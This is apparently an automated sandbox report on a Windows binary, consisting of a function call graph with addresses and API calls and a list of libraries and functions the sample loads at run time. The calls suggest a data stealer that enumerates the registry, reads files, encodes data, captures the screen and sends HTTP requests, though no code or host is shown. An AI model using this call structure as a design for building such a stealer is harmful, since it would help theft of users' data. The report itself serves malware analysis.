14269 416ea0 13995->14269 13999 413f8b 13996->13999 13997->13995 14007 41e4c0 13997->14007 13999->13713 14001 411289 14000->14001 14002 411278 memset 14000->14002 14001->13921 14002->14001 14003->13942 14005 4112ba GetProcessHeap HeapFree 14004->14005 14006 4112cc 14004->14006 14005->14006 14006->13942 14008 41e4f0 14007->14008 14009 41e4c8 14007->14009 14008->13995 14010 41e4e8 14009->14010 14012 41dd60 14009->14012 14010->13995 14013 41dd75 14012->14013 14066 41dd82 14012->14066 14014 41dd91 lstrcpyA 14013->14014 14013->14066 14015 41ddd0 14014->14015 14014->14066 14016 41de32 strlen 14015->14016 14017 41de09 14015->14017 14019 41de17 14016->14019 14069 41d0c0 lstrlenA 14017->14069 14020 41def3 14019->14020 14021 41de6c 14019->14021 14024 41d590 14 API calls 14020->14024 14022 41de75 14021->14022 14023 41df04 14021->14023 14025 41df1f 14022->14025 14026 41de7e 14022->14026 14089 41d710 14023->14089 14032 41df02 14024->14032 14025->14066 14093 41d850 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14025->14093 14028 41dea8 CreateFileA 14026->14028 14026->14066 14030 41ded5 14028->14030 14028->14066 14080 41d590 14030->14080 14031 41df42 lstrcpyA lstrcpyA lstrlenA 14034 41df8c lstrcpyA 14031->14034 14035 41df7c lstrcatA 14031->14035 14032->14031 14032->14066 14095 41e500 14034->14095 14035->14034 14037 41dee5 CloseHandle 14037->14066 14066->14010 14071 41d0d5 14069->14071 14070 41d0f7 StrCmpCA 14072 41d17c 14070->14072 14073 41d109 StrCmpCA 14070->14073 14071->14070 14071->14072 14072->14019 14073->14072 14074 41d119 StrCmpCA 14073->14074 14074->14072 14075 41d129 StrCmpCA 14074->14075 14075->14072 14076 41d139 StrCmpCA 14075->14076 14076->14072 14077 41d149 StrCmpCA 14076->14077 14077->14072 14078 41d159 StrCmpCA 14077->14078 14078->14072 14079 41d169 StrCmpCA 14078->14079 14079->14072 14081 41d5d8 SetFilePointer 14080->14081 14082 41d5cc 14080->14082 14083 41d622 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14081->14083 14084 41d5ee 14081->14084 14082->14032 14082->14037 14086 41d6dd __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14083->14086 14230 41d190 GetFileInformationByHandle 14084->14230 14088 41d60a SetFilePointer 14088->14082 14090 41d769 14089->14090 14091 41d813 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14089->14091 14090->14091 14092 41d771 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14090->14092 14091->14032 14092->14091 14094 41d919 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14093->14094 14094->14032 14096 41d3f0 5 API calls 14095->14096 14097 41e521 14096->14097 14098 41d3f0 5 API calls 14097->14098 14099 41e530 14098->14099 14100 41d3f0 5 API calls 14099->14100 14101 41e543 14100->14101 14102 41d3f0 5 API calls 14101->14102 14103 41e552 14102->14103 14104 41d3f0 5 API calls 14103->14104 14105 41e568 14104->14105 14106 41d3f0 5 API calls 14105->14106 14107 41e57a 14106->14107 14108 41d3f0 5 API calls 14107->14108 14109 41e590 14108->14109 14110 41d3f0 5 API calls 14109->14110 14111 41e5a2 14110->14111 14112 41d3f0 5 API calls 14111->14112 14113 41e5b8 14112->14113 14114 41d3f0 5 API calls 14113->14114 14115 41e5ca 14114->14115 14116 41d3f0 5 API calls 14115->14116 14117 41e5e0 14116->14117 14118 41d3f0 5 API calls 14117->14118 14119 41e5f2 14118->14119 14120 41d3f0 5 API calls 14119->14120 14121 41e608 14120->14121 14122 41d3f0 5 API calls 14121->14122 14123 41e61a 14122->14123 14124 41d3f0 5 API calls 14123->14124 14125 41e630 14124->14125 14126 41d3f0 5 API calls 14125->14126 14127 41e642 14126->14127 14128 41d3f0 5 API calls 14127->14128 14129 41e658 14128->14129 14130 41d3f0 5 API calls 14129->14130 14131 41e66a 14130->14131 14132 41d3f0 5 API calls 14131->14132 14133 41e680 14132->14133 14134 41d3f0 5 API calls 14133->14134 14135 41e692 14134->14135 14136 41d3f0 5 API calls 14135->14136 14137 41e6a8 14136->14137 14138 41d3f0 5 API calls 14137->14138 14139 41e6ba 14138->14139 14140 41d3f0 5 API calls 14139->14140 14141 41e6d0 14140->14141 14142 41d3f0 5 API calls 14141->14142 14143 41e6e2 14142->14143 14231 41d29a 14230->14231 14232 41d1af GetFileSize 14230->14232 14231->14082 14231->14088 14233 41d1f6 SetFilePointer ReadFile SetFilePointer ReadFile 14232->14233 14237 41d281 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14232->14237 14234 41d243 14233->14234 14233->14237 14235 41d24e SetFilePointer ReadFile 14234->14235 14234->14237 14235->14237 14236 41d330 FileTimeToSystemTime 14236->14231 14237->14231 14237->14236 14280 410530 14269->14280 14271 416ebf lstrlenA 14272 416f9e 14271->14272 14276 416eca 14271->14276 14273 410200 lstrcpyA 14273->14276 14275 410290 lstrcpyA 14275->14276 14276->14273 14276->14275 14277 416f71 StrCmpCA 14276->14277 14281 403090 14276->14281 14277->14276 14278 416f81 14277->14278 14279 411270 memset 14278->14279 14279->14272 14280->14271 14282 4101c0 lstrcpyA 14281->14282 14283 4030b2 14282->14283 14284 410200 lstrcpyA 14283->14284 14285 4030c2 14284->14285 14286 402790 5 API calls 14285->14286 14287 4030d2 14286->14287 14486 4116b0 14287->14486 14289 403103 14290 403113 lstrlenA 14289->14290 14291 40311f 14290->14291 14292 4116b0 7 API calls 14291->14292 14293 40312e 14292->14293 14294 4101c0 lstrcpyA 14293->14294 14295 40313d 14294->14295 14296 4101c0 lstrcpyA 14295->14296 14297 40314a 14296->14297 14298 4101c0 lstrcpyA 14297->14298 14299 403157 14298->14299 14300 4101c0 lstrcpyA 14299->14300 14301 403164 StrCmpCA 14300->14301 14302 4031ab 14301->14302 14303 40317e 14301->14303 14304 4113b0 4 API calls 14302->14304 14305 40318c InternetOpenA 14303->14305 14306 4031b9 14304->14306 14305->14302 14316 40386c 14305->14316 14307 4102e0 2 API calls 14306->14307 14308 4031c8 14307->14308 14309 410290 lstrcpyA 14308->14309 14310 4031d0 14309->14310 14311 410340 3 API calls 14310->14311 14312 4031f2 14311->14312 14313 4102e0 2 API calls 14312->14313 14314 4031fe 14313->14314 14315 410340 3 API calls 14314->14315 14317 40320b 14315->14317 14318 410200 lstrcpyA 14316->14318 14319 410290 lstrcpyA 14317->14319 14328 4038ae 14318->14328 14320 403214 14319->14320 14321 410340 3 API calls 14320->14321 14322 403239 14321->14322 14323 4102e0 2 API calls 14322->14323 14324 403245 14323->14324 14325 410290 lstrcpyA 14324->14325 14326 40324d 14325->14326 14327 40325e InternetConnectA 14326->14327 14327->14316 14329 40329e HttpOpenRequestA 14327->14329 14328->14276 14330 403865 InternetCloseHandle 14329->14330 14331 4032db 14329->14331 14330->14316 14332 403300 14331->14332 14333 4032e8 InternetSetOptionA 14331->14333 14334 410340 3 API calls 14332->14334 14333->14332 14335 403310 14334->14335 14336 410290 lstrcpyA 14335->14336 14337 403318 14336->14337 14338 4102e0 2 API calls 14337->14338 14339 40332b 14338->14339 14340 410290 lstrcpyA 14339->14340 14341 403333 14340->14341 14342 410340 3 API calls 14341->14342 14343 403347 14342->14343 14344 410290 lstrcpyA 14343->14344 14487 4116c2 14486->14487 14488 411727 14486->14488 14487->14488 14489 4116d6 CryptBinaryToStringA 14487->14489 14488->14289 14489->14488 14490 4116f3 GetProcessHeap RtlAllocateHeap 14489->14490 14490->14488 14491 41170e CryptBinaryToStringA 14490->14491 14491->14488 14492 411733 GetLastError GetProcessHeap HeapFree 14491->14492 14492->14488 14497 4101c0 lstrcpyA 14496->14497 14498 40b108 14497->14498 14499 411550 2 API calls 14498->14499 14500 40b121 14499->14500 14501 4102e0 2 API calls 14500->14501 14502 40b12d 14501->14502 14503 410290 lstrcpyA 14502->14503 14504 40b135 14503->14504 14505 4102e0 2 API calls 14504->14505 14506 40b14f 14505->14506 14507 410290 lstrcpyA 14506->14507 14508 40b157 14507->14508 14509 4101c0 lstrcpyA 14508->14509 14510 40b16a 14509->14510 14511 4102e0 2 API calls 14510->14511 14512 40b173 14511->14512 14513 410290 lstrcpyA 14512->14513 14514 40b17b 14513->14514 14515 410340 3 API calls 14514->14515 14516 40b192 14515->14516 14517 410340 3 API calls 14516->14517 14518 40b19f 14517->14518 14519 410290 lstrcpyA 14518->14519 14520 40b1a7 14519->14520 14521 410200 lstrcpyA 14520->14521 14522 40b1c2 14521->14522 14903 411520 14522->14903 14524 40b1c7 14525 40b2a0 14524->14525 14526 40b1e1 14524->14526 14550 40b298 14524->14550 14527 410200 lstrcpyA 14525->14527 14529 410200 lstrcpyA 14526->14529 14526->14550 14528 40b2b7 14527->14528 14530 410200 lstrcpyA 14528->14530 14531 40b226 14529->14531 14532 40b2c6 14530->14532 14533 410200 lstrcpyA 14531->14533 14534 410200 lstrcpyA 14532->14534 14535 40b232 14533->14535 14536 40b2d5 14534->14536 14537 410200 lstrcpyA 14535->14537 14538 410200 lstrcpyA 14536->14538 14539 40b23e 14537->14539 14540 40b2ee 14538->14540 14541 410200 lstrcpyA 14539->14541 14544 410200 lstrcpyA 14540->14544 14542 40b254 14541->14542 14543 410200 lstrcpyA 14542->14543 14545 40b278 14543->14545 14546 40b31b 14544->14546 14547 410200 lstrcpyA 14545->14547 14912 4078f0 14546->14912 14549 40b283 14547->14549 14907 40af60 14549->14907 14573 4101c0 lstrcpyA 14572->14573 14574 40b4fb 14573->14574 14575 4101c0 lstrcpyA 14574->14575 14576 40b508 14575->14576 14577 40b51d StrCmpCA 14576->14577 14578 40b531 14577->14578 14579 40b6b3 14577->14579 14581 411550 2 API calls 14578->14581 14580 411550 2 API calls 14579->14580 14582 40b6c0 14580->14582 14583 40b53c 14581->14583 14585 4102e0 2 API calls 14582->14585 14584 4102e0 2 API calls 14583->14584 14586 40b54a 14584->14586 14587 40b6cc 14585->14587 14588 410290 lstrcpyA 14586->14588 14589 410290 lstrcpyA 14587->14589 14590 40b552 14588->14590 14591 40b6d4 14589->14591 14593 4102e0 2 API calls 14590->14593 14592 4102e0 2 API calls 14591->14592 14594 40b6ee 14592->14594 14595 40b56c 14593->14595 14596 4102e0 2 API calls 14594->14596 14597 4102e0 2 API calls 14595->14597 14598 40b6fa 14596->14598 14599 40b578 14597->14599 14600 410290 lstrcpyA 14598->14600 14601 410290 lstrcpyA 14599->14601 14603 40b702 14600->14603 14602 40b580 14601->14602 14604 4101c0 lstrcpyA 14602->14604 14605 411550 2 API calls 14603->14605 14606 40b59a 14604->14606 14607 40b718 14605->14607 14608 4102e0 2 API calls 14606->14608 14609 4102e0 2 API calls 14607->14609 14610 40b5a3 14608->14610 14611 40b724 14609->14611 14612 410290 lstrcpyA 14610->14612 14613 410290 lstrcpyA 14611->14613 14614 40b5ab 14612->14614 14615 40b72d 14613->14615 14616 410340 3 API calls 14614->14616 14618 4101c0 lstrcpyA 14615->14618 14617 40b5c2 14616->14617 14619 410340 3 API calls 14617->14619 14620 40b747 14618->14620 14621 40b5cf 14619->14621 14622 4102e0 2 API calls 14620->14622 14623 410290 lstrcpyA 14621->14623 14624 40b750 14622->14624 14627 40b5d7 14623->14627 14625 410290 lstrcpyA 14624->14625 14626 40b758 14625->14626 14629 410340 3 API calls 14626->14629 14628 410200 lstrcpyA 14627->14628 14630 40b5f2 14628->14630 14631 40b76f 14629->14631 14632 411520 GetFileAttributesA 14630->14632 14633 410340 3 API calls 14631->14633 14634 40b5f7 14632->14634 14635 40b77c 14633->14635 14638 40b611 14634->14638 14639 40b876 14634->14639 14698 40b86e 14634->14698 14636 410290 lstrcpyA 14635->14636 14637 40b784 14636->14637 14648 410200 lstrcpyA 14637->14648 14641 410200 lstrcpyA 14638->14641 14638->14698 14640 410200 lstrcpyA 14639->14640 14642 40b88d 14640->14642 14643 40b657 14641->14643 14644 410200 lstrcpyA 14642->14644 14645 410200 lstrcpyA 14643->14645 14646 40b89c 14644->14646 14649 40b663 14645->14649 14647 410200 lstrcpyA 14646->14647 14650 40b8ab 14647->14650 14651 40b79f 14648->14651 14652 410200 lstrcpyA 14649->14652 14654 410200 lstrcpyA 14650->14654 14655 411520 GetFileAttributesA 14651->14655 14653 40b66f 14652->14653 14656 410200 lstrcpyA 14653->14656 14657 40b8c4 14654->14657 14658 40b7a4 14655->14658 14659 40b685 14656->14659 14664 410200 lstrcpyA 14657->14664 14661 40b7c0 14658->14661 14662 40b9db 14658->14662 14658->14698 14660 410200 lstrcpyA 14659->14660 14663 40b6a9 14660->14663 14665 410200 lstrcpyA 14661->14665 14666 410200 lstrcpyA 14662->14666 14671 410200 lstrcpyA 14663->14671 14667 40b8f1 14664->14667 14668 40b7fc 14665->14668 14669 40b9f0 14666->14669 14672 4078f0 144 API calls 14667->14672 14673 410200 lstrcpyA 14668->14673 14670 410200 lstrcpyA 14669->14670 14674 40b9ff 14670->14674 14675 40b859 14671->14675 14676 40b90f 14672->14676 14677 40b808 14673->14677 14679 410200 lstrcpyA 14674->14679 14676->14698 14678 410200 lstrcpyA 14677->14678 14681 40b814 14678->14681 14682 40ba0e 14679->14682 14730 4101c0 lstrcpyA 14729->14730 14731 40ce08 14730->14731 14732 4101c0 lstrcpyA 14731->14732 14733 40ce15 14732->14733 14734 411550 2 API calls 14733->14734 14735 40ce20 14734->14735 14736 4102e0 2 API calls 14735->14736 14737 40ce2c 14736->14737 14738 410290 lstrcpyA 14737->14738 14739 40ce34 14738->14739 14740 4102e0 2 API calls 14739->14740 14741 40ce4e 14740->14741 14742 410290 lstrcpyA 14741->14742 14743 40ce56 14742->14743 14744 4102e0 2 API calls 14743->14744 14745 40ce69 14744->14745 14746 410290 lstrcpyA 14745->14746 14747 40ce76 14746->14747 14748 410340 3 API calls 14747->14748 14749 40ce8d 14748->14749 14750 410340 3 API calls 14749->14750 14751 40ce9a 14750->14751 14752 410290 lstrcpyA 14751->14752 14753 40cea3 14752->14753 14754 410200 lstrcpyA 14753->14754 14755 40cec1 14754->14755 14756 411520 GetFileAttributesA 14755->14756 14757 40cec6 14756->14757 14758 40cfa4 14757->14758 14759 40cedf 14757->14759 14788 40cf9f 14757->14788 14761 410200 lstrcpyA 14758->14761 14760 410200 lstrcpyA 14759->14760 14762 40cf1d 14760->14762 14763 40cfbc 14761->14763 14764 410200 lstrcpyA 14762->14764 14765 410200 lstrcpyA 14763->14765 14766 40cf29 14764->14766 14767 40cfc8 14765->14767 14768 4101c0 lstrcpyA 14766->14768 14769 4101c0 lstrcpyA 14767->14769 14770 40cf36 14768->14770 14771 40cfd5 14769->14771 14772 410200 lstrcpyA 14770->14772 14773 410200 lstrcpyA 14771->14773 14774 40cf41 14772->14774 14775 40cfe0 14773->14775 14776 410200 lstrcpyA 14774->14776 14777 410200 lstrcpyA 14775->14777 14778 40cf4d 14776->14778 14779 40cfec 14777->14779 14781 410200 lstrcpyA 14778->14781 14780 410200 lstrcpyA 14779->14780 14783 40cff8 14780->14783 14782 40cf59 14781->14782 14784 410200 lstrcpyA 14782->14784 14785 410200 lstrcpyA 14783->14785 14786 40cf6f 14784->14786 14787 40d00e 14785->14787 15838 40c790 14786->15838 15936 409460 14787->15936 14792 40da5f RegGetValueA 14791->14792 14800 40daa2 14791->14800 14793 40da89 14792->14793 14794 40da8e 14792->14794 14797 40da9b RegCloseKey 14793->14797 14793->14800 14794->14793 14795 40dadd RegOpenKeyExA 14794->14795 14796 40dacf RegCloseKey 14794->14796 14798 40daf6 RegEnumKeyExA 14795->14798 14795->14800 14796->14795 14797->14800 14798->14793 14799 40db28 14798->14799 14801 4101c0 lstrcpyA 14799->14801 14800->13730 14811 40db37 14801->14811 14802 40dc2a RegGetValueA 14802->14811 14804 4102e0 2 API calls 14804->14811 14805 410340 lstrlenA lstrcpyA lstrcatA 14805->14811 14806 410290 lstrcpyA 14806->14811 14807 40dd12 RegGetValueA 14808 410340 3 API calls 14807->14808 14808->14811 14809 40dd4e StrCmpCA 14809->14811 14811->14802 14811->14804 14811->14805 14811->14806 14811->14807 14811->14809 14812 40db6d RegEnumKeyExA 14811->14812 14816 40db42 ??3@YAXPAX 14811->14816 14817 40dddf _invalid_parameter_noinfo_noreturn 14811->14817 16052 411ea0 wsprintfA 14811->16052 16055 40d250 14811->16055 14812->14811 14813 40dde4 14812->14813 14814 40ddfd lstrlenA 14813->14814 14815 40de0a 14814->14815 14818 4101c0 lstrcpyA 14815->14818 14816->14811 14817->14813 14819 40de19 14818->14819 14820 406f80 lstrcpyA 14819->14820 14821 40de25 14820->14821 14822 413e50 130 API calls 14821->14822 14823 40de38 14822->14823 14824 40de6c 14823->14824 14825 40de5e RegCloseKey 14823->14825 14824->14800 14825->14824 14827 4101c0 lstrcpyA 14826->14827 14828 40de98 14827->14828 14829 411550 2 API calls 14828->14829 14830 40dea9 14829->14830 14831 4102e0 2 API calls 14830->14831 14832 40deb5 14831->14832 14833 410290 lstrcpyA 14832->14833 14834 40debd 14833->14834 14835 410340 3 API calls 14834->14835 14836 40ded8 14835->14836 14837 410290 lstrcpyA 14836->14837 14838 40dee0 14837->14838 14839 410200 lstrcpyA 14838->14839 14840 40def6 14839->14840 14841 4076b0 6 API calls 14840->14841 14842 40df07 14841->14842 14843 4115b0 LocalAlloc 14842->14843 14851 40e064 14842->14851 14844 40df1c 14843->14844 14845 40df24 strtok_s 14844->14845 14844->14851 14846 4101c0 lstrcpyA 14845->14846 14847 40df44 14846->14847 14848 4101c0 lstrcpyA 14847->14848 14849 40df51 14848->14849 14850 4101c0 lstrcpyA 14849->14850 14852 40df5e 14850->14852 14851->13759 14853 4101c0 lstrcpyA 14852->14853 14854 40df6b GetProcessHeap HeapAlloc 14853->14854 14855 40e0b9 StrStrA 14854->14855 14856 40df8c lstrlenA 14854->14856 14932 410530 14903->14932 14905 411534 GetFileAttributesA 14906 411545 14905->14906 14906->14524 14908 40af76 14907->14908 14909 40b0b0 14907->14909 14908->14909 14913 4101c0 lstrcpyA 14912->14913 14914 40790e 14913->14914 14975 4076b0 14914->14975 14932->14905 15839 4101c0 lstrcpyA 15838->15839 15840 40c7b2 15839->15840 15937 4101c0 lstrcpyA 15936->15937 15938 409481 15937->15938 15939 4102e0 2 API calls 15938->15939 16053 4101c0 lstrcpyA 16052->16053 16054 411ec6 16053->16054 16054->14811 16169 40d080 lstrlenA 16055->16169 16057 40d2ac GetProcessHeap HeapAlloc 16058 40d2d1 strcpy_s 16057->16058 16059 40d3dc 16057->16059 16060 40d2e2 GetProcessHeap HeapFree 16058->16060 16061 40d2f9 16058->16061 16062 40d3e4 GetProcessHeap HeapFree 16059->16062 16063 40d758 16059->16063 16060->16061 16065 40d3f9 16061->16065 16066 40d080 370 API calls 16061->16066 16062->16063 16064 402400 11 API calls 16063->16064 16090 40d77f 16063->16090 16064->16090 16068 40d080 370 API calls 16065->16068 16070 40d318 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16066->16070 16067 40d819 16067->14811 16072 40d40d GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16068->16072 16069 40d7c3 ??3@YAXPAX 16075 40d7cc 16069->16075 16070->16059 16074 40d349 strcpy_s 16070->16074 16071 40d810 ??3@YAXPAX 16071->16067 16076 40d440 strcpy_s 16072->16076 16077 40d73b 16072->16077 16073 40d9a7 _invalid_parameter_noinfo_noreturn 16078 40d9ac 16073->16078 16079 40d371 16074->16079 16080 40d35a GetProcessHeap HeapFree 16074->16080 16075->16067 16075->16071 16075->16073 16092 40d80e 16075->16092 16083 40d467 lstrlenA GetProcessHeap HeapAlloc 16076->16083 16084 40d457 GetProcessHeap HeapFree 16076->16084 16077->16063 16081 40d73f GetProcessHeap 16077->16081 16085 402510 4 API calls 16078->16085 16082 40d080 370 API calls 16079->16082 16080->16079 16086 40d74f HeapFree 16081->16086 16087 40d381 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16082->16087 16083->16063 16089 40d499 16083->16089 16084->16083 16088 40d9b5 memset memset memset memset RegOpenKeyExA 16085->16088 16086->16063 16087->16059 16091 40d3b2 strcpy_s 16087->16091 16097 40da5f RegGetValueA 16088->16097 16110 40daa2 16088->16110 16094 40d4c0 16089->16094 16095 40d4b5 strlen 16089->16095 16090->16069 16090->16073 16090->16075 16091->16065 16096 40d3c3 GetProcessHeap HeapFree 16091->16096 16092->16071 16100 402400 11 API calls 16094->16100 16095->16094 16096->16065 16098 40da89 16097->16098 16099 40da8e 16097->16099 16105 40da9b RegCloseKey 16098->16105 16098->16110 16099->16098 16103 40dadd RegOpenKeyExA 16099->16103 16104 40dacf RegCloseKey 16099->16104 16101 40d4cd lstrlenA 16100->16101 16102 40ed20 11 API calls 16101->16102 16106 40d4fe strcpy_s 16102->16106 16107 40daf6 RegEnumKeyExA 16103->16107 16103->16110 16104->16103 16105->16110 16118 40d51d 16106->16118 16125 40d561 16106->16125 16107->16098 16109 40db28 16107->16109 16111 4101c0 lstrcpyA 16109->16111 16110->14811 16157 40db37 16111->16157 16112 40d558 ??3@YAXPAX 16112->16125 16113 40d5c3 GetProcessHeap HeapFree lstrlenA GetProcessHeap HeapAlloc 16114 40d748 GetProcessHeap 16113->16114 16115 40d5fd strcpy_s GetProcessHeap HeapFree 16113->16115 16114->16086 16117 40d628 16115->16117 16133 40d670 16115->16133 16116 40d5ba ??3@YAXPAX 16116->16113 16120 40d92f GetProcessHeap HeapFree 16117->16120 16123 40d825 16117->16123 16124 40d65b strlen 16117->16124 16118->16073 16118->16112 16119 40d080 370 API calls 16121 40d68f GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16119->16121 16120->16090 16122 40d953 16120->16122 16121->16077 16126 40d6be strcpy_s 16121->16126 16122->16090 16127 40d961 memcpy 16122->16127 16129 402400 11 API calls 16123->16129 16124->16123 16125->16073 16125->16113 16125->16116 16128 40d6cf GetProcessHeap HeapFree 16126->16128 16126->16133 16127->16090 16128->16133 16130 40d834 16129->16130 16131 406940 3 API calls 16130->16131 16140 40d83e 16131->16140 16132 402520 6 API calls 16132->16133 16133->16078 16133->16117 16133->16119 16133->16132 16134 40d88b 16135 40d8a2 16134->16135 16136 40d897 strlen 16134->16136 16138 406b00 276 API calls 16135->16138 16136->16135 16137 40d882 ??3@YAXPAX 16137->16134 16139 40d8af 16138->16139 16141 40ed20 11 API calls 16139->16141 16140->16073 16140->16134 16140->16137 16142 40d8da 16141->16142 16145 40dc2a RegGetValueA 16145->16157 16146 411ea0 2 API calls 16146->16157 16148 4102e0 2 API calls 16148->16157 16149 410290 lstrcpyA 16149->16157 16150 40dd12 RegGetValueA 16151 410340 3 API calls 16150->16151 16151->16157 16152 40dd4e StrCmpCA 16152->16157 16153 410340 lstrlenA lstrcpyA lstrcatA 16153->16157 16154 40d250 370 API calls 16154->16157 16155 40db6d RegEnumKeyExA 16156 40dde4 16155->16156 16155->16157 16158 40ddfd lstrlenA 16156->16158 16157->16145 16157->16146 16157->16148 16157->16149 16157->16150 16157->16152 16157->16153 16157->16154 16157->16155 16160 40db42 ??3@YAXPAX 16157->16160 16161 40dddf _invalid_parameter_noinfo_noreturn 16157->16161 16159 40de0a 16158->16159 16162 4101c0 lstrcpyA 16159->16162 16160->16157 16161->16156 16163 40de19 16162->16163 16164 406f80 lstrcpyA 16163->16164 16165 40de25 16164->16165 16166 413e50 130 API calls 16165->16166 16167 40de38 16166->16167 16167->16110 16168 40de5e RegCloseKey 16167->16168 16168->16110 16170 40d227 16169->16170 16171 40d0ad strchr 16169->16171 16170->16057 16171->16170 16172 40d0c6 strchr 16171->16172 16172->16170 16173 40d0de lstrlenA GetProcessHeap HeapAlloc 16172->16173 16173->16170 16174 40d115 16173->16174 16175 40d13a 16174->16175 16176 40d12f strlen 16174->16176 16177 402400 11 API calls 16175->16177 16176->16175 16178 40d14c 16177->16178 16179 40ed20 11 API calls 16178->16179 16180 40d171 strcpy_s 16179->16180 16185 40d1d5 16180->16185 16187 40d199 16180->16187 16182 40d1cc ??3@YAXPAX 16182->16185 16183 40d21e ??3@YAXPAX 16183->16170 16184 40d244 _invalid_parameter_noinfo_noreturn 16186 40d250 16184->16186 16185->16170 16185->16183 16185->16184 16190 40d21c 16185->16190 16188 40d080 359 API calls 16186->16188 16187->16182 16187->16184 16189 40d2ac GetProcessHeap HeapAlloc 16188->16189 16191 40d2d1 strcpy_s 16189->16191 16192 40d3dc 16189->16192 16190->16183 16193 40d2e2 GetProcessHeap HeapFree 16191->16193 16194 40d2f9 16191->16194 16195 40d3e4 GetProcessHeap HeapFree 16192->16195 16196 40d758 16192->16196 16193->16194 16198 40d3f9 16194->16198 16199 40d080 359 API calls 16194->16199 16195->16196 16197 402400 11 API calls 16196->16197 16223 40d77f 16196->16223 16197->16223 16201 40d080 359 API calls 16198->16201 16203 40d318 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16199->16203 16200 40d819 16200->16057 16205 40d40d GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16201->16205 16202 40d7c3 ??3@YAXPAX 16208 40d7cc 16202->16208 16203->16192 16207 40d349 strcpy_s 16203->16207 16204 40d810 ??3@YAXPAX 16204->16200 16209 40d440 strcpy_s 16205->16209 16210 40d73b 16205->16210 16206 40d9a7 _invalid_parameter_noinfo_noreturn 16211 40d9ac 16206->16211 16212 40d371 16207->16212 16213 40d35a GetProcessHeap HeapFree 16207->16213 16208->16200 16208->16204 16208->16206 16225 40d80e 16208->16225 16216 40d467 lstrlenA GetProcessHeap HeapAlloc 16209->16216 16217 40d457 GetProcessHeap HeapFree 16209->16217 16210->16196 16214 40d73f GetProcessHeap 16210->16214 16218 402510 4 API calls 16211->16218 16215 40d080 359 API calls 16212->16215 16213->16212 16219 40d74f HeapFree 16214->16219 16220 40d381 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16215->16220 16216->16196 16222 40d499 16216->16222 16217->16216 16221 40d9b5 memset memset memset memset RegOpenKeyExA 16218->16221 16219->16196 16220->16192 16224 40d3b2 strcpy_s 16220->16224 16230 40da5f RegGetValueA 16221->16230 16248 40daa2 16221->16248 16227 40d4c0 16222->16227 16228 40d4b5 strlen 16222->16228 16223->16202 16223->16206 16223->16208 16224->16198 16229 40d3c3 GetProcessHeap HeapFree 16224->16229 16225->16204 16233 402400 11 API calls 16227->16233 16228->16227 16229->16198 16231 40da89 16230->16231 16232 40da8e 16230->16232 16238 40da9b RegCloseKey 16231->16238 16231->16248 16232->16231 16236 40dadd RegOpenKeyExA 16232->16236 16237 40dacf RegCloseKey 16232->16237 16234 40d4cd lstrlenA 16233->16234 16235 40ed20 11 API calls 16234->16235 16239 40d4fe strcpy_s 16235->16239 16240 40daf6 RegEnumKeyExA 16236->16240 16236->16248 16237->16236 16238->16248 16251 40d51d 16239->16251 16258 40d561 16239->16258 16240->16231 16242 40db28 16240->16242 16243 4101c0 lstrcpyA 16242->16243 16297 40db37 16243->16297 16244 40d558 ??3@YAXPAX 16244->16258 16245 40d5c3 GetProcessHeap HeapFree lstrlenA GetProcessHeap HeapAlloc 16248->16057 16249 40d5ba ??3@YAXPAX 16249->16245 16251->16206 16251->16244 16258->16206 16258->16245 16258->16249 16265 410340 lstrlenA lstrcpyA lstrcatA 16265->16297 16278 410290 lstrcpyA 16278->16297 16280 40dc2a RegGetValueA 16280->16297 16281 411ea0 2 API calls 16281->16297 16283 4102e0 2 API calls 16283->16297 16284 40dd12 RegGetValueA 16285 410340 3 API calls 16284->16285 16285->16297 16286 40dd4e StrCmpCA 16286->16297 16287 40d250 359 API calls 16287->16297 16288 40db6d RegEnumKeyExA 16288->16297 16292 40db42 ??3@YAXPAX 16292->16297 16293 40dddf _invalid_parameter_noinfo_noreturn 16297->16265 16297->16278 16297->16280 16297->16281 16297->16283 16297->16284 16297->16286 16297->16287 16297->16288 16297->16292 16297->16293

                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                  Function 004188E0 Relevance: 334.8, APIs: 71, Strings: 120, Instructions: 518libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(gdiplus.dll,00417538), ref: 00418D07
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(ole32.dll), ref: 00418D17
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(bcrypt.dll), ref: 00418D27
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(wininet.dll), ref: 00418D37
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00418D47
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(shell32.dll), ref: 00418D57
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(psapi.dll), ref: 00418D67
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(rstrtmgr.dll), ref: 00418D77
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418D87
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(751E0000,CreateCompatibleBitmap), ref: 00418DA1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(SelectObject), ref: 00418DB7
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(BitBlt), ref: 00418DCD
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(DeleteObject), ref: 00418DE3
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CreateCompatibleDC), ref: 00418DF9
